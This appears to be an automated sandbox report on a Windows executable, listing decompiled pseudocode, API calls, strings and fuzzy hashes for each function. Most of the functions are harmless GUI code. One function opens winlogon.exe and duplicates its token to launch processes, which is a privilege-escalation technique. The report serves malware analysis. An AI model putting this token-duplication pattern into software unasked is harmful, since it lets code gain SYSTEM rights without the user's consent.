							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
wcscpy.MSVCRT ref: 00405C02

Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE

wcslen.MSVCRT ref: 00405C20
GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73

Strings

strings, xrefs: 00405BF8

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
String ID: strings
API String ID: 3166385802-3030018805
Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C

Uniqueness

Uniqueness Score: -1.00%

Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}

APIs

OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3

Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB

Strings

winlogon.exe, xrefs: 00401E4B

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
String ID: winlogon.exe
API String ID: 1315556178-961692650
Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94

Uniqueness

Uniqueness Score: -1.00%

Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}

APIs

memset.MSVCRT ref: 00405257
_snwprintf.MSVCRT ref: 00405285
wcslen.MSVCRT ref: 00405291
memcpy.MSVCRT ref: 004052A9
wcslen.MSVCRT ref: 004052B7
memcpy.MSVCRT ref: 004052CA

Strings

%s (%s), xrefs: 0040527A

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpywcslen$_snwprintfmemset
String ID: %s (%s)
API String ID: 3979103747-1363028141
Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}

APIs

memset.MSVCRT ref: 00406174
GetDlgCtrlID.USER32 ref: 0040617F
GetWindowTextW.USER32 ref: 00406196
memset.MSVCRT ref: 004061BD
GetClassNameW.USER32 ref: 004061D4
_wcsicmp.MSVCRT ref: 004061E6

Part of subcall function 00406025: memset.MSVCRT ref: 00406038
Part of subcall function 00406025: _itow.MSVCRT ref: 00406046

Strings

sysdatetimepick32, xrefs: 004061E0

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
String ID: sysdatetimepick32
API String ID: 1028950076-4169760276
Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D

Uniqueness

Uniqueness Score: -1.00%

Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52
librarywindowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}

0x00404706
0x00404714
0x0040471c
0x00404721
0x0040472b
0x00404733
0x00404735
0x00404735
0x00404733
0x00404751
0x00404780
0x00404753
0x0040475e
0x00404766
0x0040476c
0x00404770
0x00404770
0x0040478a

APIs

LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
wcslen.MSVCRT ref: 00404756
wcscpy.MSVCRT ref: 00404766
LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
wcscpy.MSVCRT ref: 00404780

Strings

netmsg.dll, xrefs: 00404726

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
String ID: netmsg.dll
API String ID: 2767993716-3706735626
Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}

APIs

memset.MSVCRT ref: 004059B5

Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C

Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34

_wcsicmp.MSVCRT ref: 004059FA
wcschr.MSVCRT ref: 00405A0E
_wcsicmp.MSVCRT ref: 00405A20
OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
CloseHandle.KERNEL32(?), ref: 00405A5A
CloseHandle.KERNEL32(00000000), ref: 00405A61

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
String ID:
API String ID: 768606695-0
Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98

Uniqueness

Uniqueness Score: -1.00%

Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}

APIs

wcscat.MSVCRT ref: 00407708
_snwprintf.MSVCRT ref: 0040772F

Strings

<td bgcolor=#%s>%s, xrefs: 00407657
<tr>, xrefs: 00407661
<td bgcolor=#%s nowrap>%s, xrefs: 00407649
 , xrefs: 00407702

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfwcscat
String ID:  $<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
API String ID: 384018552-4153097237
Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79
windowCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}

APIs

GetMenuItemCount.USER32 ref: 00406074
memset.MSVCRT ref: 00406093
GetMenuItemInfoW.USER32 ref: 004060CF
wcschr.MSVCRT ref: 004060E7

Strings

6, xrefs: 004060B6
0, xrefs: 004060AE

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMenu$CountInfomemsetwcschr
String ID: 0$6
API String ID: 2029023288-3849865405
Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}

APIs

GetSystemMetrics.USER32 ref: 00402C1C
GetSystemMetrics.USER32 ref: 00402C23
GetSystemMetrics.USER32 ref: 00402C2A
GetSystemMetrics.USER32 ref: 00402C30
GetSystemMetrics.USER32 ref: 00402C47
GetSystemMetrics.USER32 ref: 00402C4E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$Window
String ID:
API String ID: 1155976603-0
Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
